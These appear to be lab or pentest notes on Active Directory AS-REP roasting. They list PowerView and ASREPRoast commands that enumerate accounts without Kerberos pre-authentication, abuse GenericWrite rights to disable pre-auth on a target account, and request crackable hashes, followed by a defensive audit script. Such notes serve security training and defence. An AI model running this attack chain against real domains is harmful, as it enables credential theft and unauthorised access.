AD Pre Auth, AS-REP, GenericWrite/All

Enum Users With Kerberos Pre Auth Disabled

. .\PowerView_dev.ps1

Get-DomainUser -PreauthNotRequired

Request Hash

. C:\AD\Tools\ASREPRoast-master\ASREPRoast-master\ASREPRoast.ps1

Get-ASREPHash -UserName VPN648user

Enum Users Who Have GenericWrite/All Rights

. .\PowerView_dev.ps1

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Force Set Preauth Not Required

Set-DomainObject -Identity Control648User -XOR @{useraccountcontrol=4194304} -Verbose

Get-DomainUser -PreauthNotRequired -Identity Control648User

Request Ticket

Get-ASREPHash -UserName Control648User -Verbose

We can crack this ticket too.
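
Defender-side audit for the steps above (an added example, not part of the original notes or of PowerView/ASREPRoast): it lists accounts whose userAccountControl has bit 4194304 (DONT_REQ_PREAUTH) set and pulls successful 4768 TGT requests made without pre-authentication. The $Dc and $Hours parameters are assumptions; it needs the ActiveDirectory RSAT module and read access to the domain controller's Security log.

```powershell
# Added defensive example; parameter names and defaults are assumptions.
param(
    [string]$Dc = (Get-ADDomain).PDCEmulator,   # DC to query
    [int]$Hours = 24                            # look-back window for events
)
Import-Module ActiveDirectory

# 1) Accounts with DONT_REQ_PREAUTH (userAccountControl bit 4194304 = 0x400000).
#    The LDAP bitwise-AND matching rule (1.2.840.113556.1.4.803) tests that one bit.
$flagged = Get-ADUser -Server $Dc `
    -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' `
    -Properties userAccountControl, whenChanged
$flagged |
    Select-Object SamAccountName, Enabled, whenChanged, userAccountControl |
    Format-Table -AutoSize

# 2) Successful TGT requests (event 4768) that were issued with no pre-authentication.
$events = Get-WinEvent -ComputerName $Dc -ErrorAction SilentlyContinue -FilterHashtable @{
    LogName = 'Security'; Id = 4768; StartTime = (Get-Date).AddHours(-$Hours)
}
$noPreauth = foreach ($e in $events) {
    # Flatten the event's named <Data> fields into a hashtable.
    $d = @{}
    ([xml]$e.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
    if ($d['PreAuthType'] -eq '0' -and $d['Status'] -eq '0x0') {
        [pscustomobject]@{
            Time     = $e.TimeCreated
            Account  = $d['TargetUserName']
            ClientIp = $d['IpAddress']
            EncType  = $d['TicketEncryptionType']   # 0x17 = RC4-HMAC
        }
    }
}
$noPreauth | Sort-Object Time | Format-Table -AutoSize

# 3) Remediation, left commented out: require pre-authentication again.
# $flagged | Set-ADAccountControl -DoesNotRequirePreAuth $false
```

Event 4768 is written on the domain controller that served the request, so run the event query against each DC. An account that shows up in step 1 with a recent whenChanged and no business reason for the flag is worth checking against who holds GenericWrite/GenericAll on it.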

Abusing Active Directory ACLs/ACEs

AS-REP Roasting